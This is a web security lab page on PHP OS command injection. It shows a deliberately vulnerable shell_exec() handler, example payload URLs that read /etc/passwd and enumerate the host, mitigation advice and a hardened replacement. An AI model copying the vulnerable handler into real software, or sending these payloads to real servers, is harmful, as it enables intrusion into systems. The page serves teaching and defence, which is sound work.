Lab 1: Basic Command Injection

RCE through direct command execution

Difficulty: Low

Lab Overview

This lab demonstrates the simplest form of Remote Code Execution: OS command injection. The application takes the cmd query parameter and passes it straight to shell_exec(), so whatever the client sends is run by /bin/sh as the web-server user, with no validation, allowlisting or escaping.

Objective: Execute arbitrary system commands to gain control of the server.

Vulnerable PHP Code

<?php
// Handle command execution request
if (isset($_GET['cmd']) && !empty($_GET['cmd'])) {
    $command = $_GET['cmd'];

    // Vulnerable: the raw query-string value is handed to /bin/sh via
    // shell_exec(). Every shell metacharacter (; && | $() backticks) is
    // interpreted, so the client decides which binary runs and with what.
    // The try/catch is dead code: shell_exec() does not throw, it returns
    // null when there is no output or an error, which ?: maps to 'No output'.
    try {
        $output = shell_exec($command . ' 2>&1'); // 2>&1 also returns stderr to the client
        $command_output = $output ?: 'No output';
        // Display output
        echo '<pre>' . htmlspecialchars($command_output, ENT_QUOTES, 'UTF-8') . '</pre>';
    } catch (Exception $e) {
        // Error handling (never reached, see above)
    }
}

// Example vulnerable usage (spaces and & must be URL-encoded as %20 and %26
// when sent in the URL, otherwise the query-string parser splits the command):
// ?cmd=whoami
// ?cmd=ls%20-la
// ?cmd=cat%20/etc/passwd
// ?cmd=id%20%26%26%20uname%20-a

Command Execution Demo

Sample run of the lab with cmd=id:

Command executed successfully!
Command Output:
uid=2256(kzlabsst) gid=2260(kzlabsst) groups=2260(kzlabsst)

Vulnerability Details
  • Type: OS Command Injection leading to Remote Code Execution (RCE)
  • Severity: Critical
  • Parameter: cmd
  • Method: GET
  • Sink: shell_exec($command . ' 2>&1')
  • Issue: The raw parameter value is executed by the shell with no validation, allowlist or escaping

Test Commands

Try these commands in the cmd parameter:

  • whoami - Current user (the account the web server runs as)
  • ls -la - List files in the web root
  • cat /etc/passwd - Local accounts on the host
  • id && uname -a - User ID, groups, and kernel/OS version
  • ps aux - Running processes
  • netstat -tulpn - Listening TCP/UDP sockets (owning PIDs are only shown for processes the web-server user owns)

Spaces and shell metacharacters must be URL-encoded when the command is typed into the address bar or sent with a tool: a space becomes %20 (or +) and & becomes %26. Sent raw, id && uname -a is split by the query-string parser into cmd=id plus two stray parameters, and only id runs.

Example URLs:

  • 1.php?cmd=whoami
  • 1.php?cmd=cat%20/etc/passwd
  • 1.php?cmd=id%20%26%26%20uname%20-a
Real-World Attack Scenarios

Mitigation Strategies
  • Never pass user input to shell_exec(), exec(), system(), passthru(), popen() or backticks; if the feature is needed at all, map a fixed set of action names to hard-coded argv arrays and run them without a shell (proc_open() accepts an argv array as of PHP 7.4)
  • If a shell cannot be avoided, wrap each user-controlled argument in escapeshellarg(); escapeshellcmd() on the whole command line is not a substitute
  • Validate every operand against a strict allowlist pattern (for example a hostname regex) instead of trying to blocklist metacharacters
  • Fail closed: reject unknown actions, and log shell error text rather than echoing it back to the client
  • Run PHP as an unprivileged user and list the execution functions in disable_functions in php.ini on hosts that do not need them
  • Log every invocation (action, operand, client address, exit status) and alert on rejected requests
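
A hardened version of the lab handler, written for this page as an added example (it is not the lab's own code). It keeps the feature but removes the shell: the client names an action rather than supplying a command, fixed actions map to hard-coded argv arrays, and the one action that takes an operand (ping with a hostname) validates it against an allowlist regex before it is appended to argv. Assumed: PHP 7.4 or later, Linux binaries at /usr/bin/whoami, /usr/bin/uptime, /bin/df and /bin/ping (iputils, so -c and -W exist), and the parameter names action and arg.

```php
<?php
declare(strict_types=1);

// Hardened replacement for the lab's cmd handler (added example, not the
// lab's code). Assumes PHP >= 7.4: the array form of proc_open() executes
// the program directly, so /bin/sh never sees any of these values.

// Fixed actions: the client picks a name, never a command string.
const FIXED_ACTIONS = [
    'whoami' => ['/usr/bin/whoami'],
    'uptime' => ['/usr/bin/uptime'],
    'disk'   => ['/bin/df', '-h'],
];

// Actions with one client-supplied operand. The operand must match the
// allowlist regex before it is appended to argv. The pattern forbids a
// leading '-' so the value can never be parsed as an option by ping.
const OPERAND_ACTIONS = [
    'ping' => [
        'argv'    => ['/bin/ping', '-c', '1', '-W', '2'],
        'pattern' => '/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/',
    ],
];

/** Run argv without a shell; return exit status and combined stdout/stderr. */
function run_argv(array $argv): array
{
    $descriptors = [
        0 => ['file', '/dev/null', 'r'],
        1 => ['pipe', 'w'],
        2 => ['pipe', 'w'],
    ];
    $proc = proc_open($argv, $descriptors, $pipes);
    if (!is_resource($proc)) {
        return ['exit' => -1, 'output' => ''];
    }
    // Outputs here are small; for large or chatty programs switch the pipes
    // to non-blocking mode and read both in a loop to avoid a full-buffer stall.
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $exit = proc_close($proc);
    return ['exit' => $exit, 'output' => $stdout . $stderr];
}

/** Dispatch one request; returns [http_status, body]. Fails closed. */
function handle_request(array $query): array
{
    $action = (string)($query['action'] ?? '');
    $client = $_SERVER['REMOTE_ADDR'] ?? 'cli';

    if (isset(FIXED_ACTIONS[$action])) {
        $result = run_argv(FIXED_ACTIONS[$action]);
    } elseif (isset(OPERAND_ACTIONS[$action])) {
        $spec    = OPERAND_ACTIONS[$action];
        $operand = (string)($query['arg'] ?? '');
        if (preg_match($spec['pattern'], $operand) !== 1) {
            error_log("rejected operand for action '$action' from $client");
            return [400, "invalid argument for action '$action'"];
        }
        $result = run_argv(array_merge($spec['argv'], [$operand]));
    } else {
        error_log("rejected unknown action '$action' from $client");
        return [400, 'unknown action'];
    }

    // Log failure detail server-side; the client gets a generic message.
    if ($result['exit'] !== 0) {
        error_log("action '$action' exited {$result['exit']}: {$result['output']}");
        return [500, 'command failed'];
    }
    return [200, $result['output']];
}

[$status, $body] = handle_request($_GET);
http_response_code($status);
header('Content-Type: text/plain; charset=utf-8');
echo $body;
```

A request such as 1.php?action=ping&arg=example.com;id is rejected before anything runs because ; fails the pattern, and a value that does pass validation reaches ping as a single argv element, not as text for a shell to re-parse. If a shell genuinely cannot be avoided, keep the allowlist and wrap each operand in escapeshellarg(); escapeshellcmd() applied to the whole command line does not give the same guarantee.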